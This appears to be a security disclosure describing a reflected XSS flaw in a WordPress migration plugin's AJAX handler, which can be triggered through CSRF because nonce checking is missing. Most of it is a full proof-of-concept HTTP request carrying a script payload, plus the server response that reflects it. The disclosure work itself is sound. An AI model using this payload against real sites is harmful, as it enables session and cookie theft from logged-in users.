XSS at _sanitize_data()

[psie]

A logged in user can be tricked into visiting a site executing a POST request like this (possible since there is no nonce checking here):

POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140903 Firefox/24.0 Iceweasel/24.8.0
Accept: text/plain, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wp/wp-admin/tools.php?page=wp-migrate-db
Content-Length: 67
Cookie: wordpress_732bf205f063fd120b84d8a0d44e2d5d=admin%7C1435910214%7C4c8949db20de2daae58491adc261c687; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1435738697; wordpress_logged_in_732bf205f063fd120b84d8a0d44e2d5d=admin%7C1435910214%7C8bdff8e1ff8f31caa902bc905439eb03
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=wpmdb_plugin_compatibility&install=<script>alert(1)</script>

Receiving in return:

HTTP/1.1 200 OK
Date: Wed, 01 Jul 2015 08:29:14 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 107
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

ajax_plugin_compatibility was expecting a valid numeric but got something else: "<script>alert(1)</script>"

This results in execution of script in the vulnerable domains context, enabling the attacker to steal user data (e.g. cookies).

I believe responses from _sanitize_data() should be sanitized itself.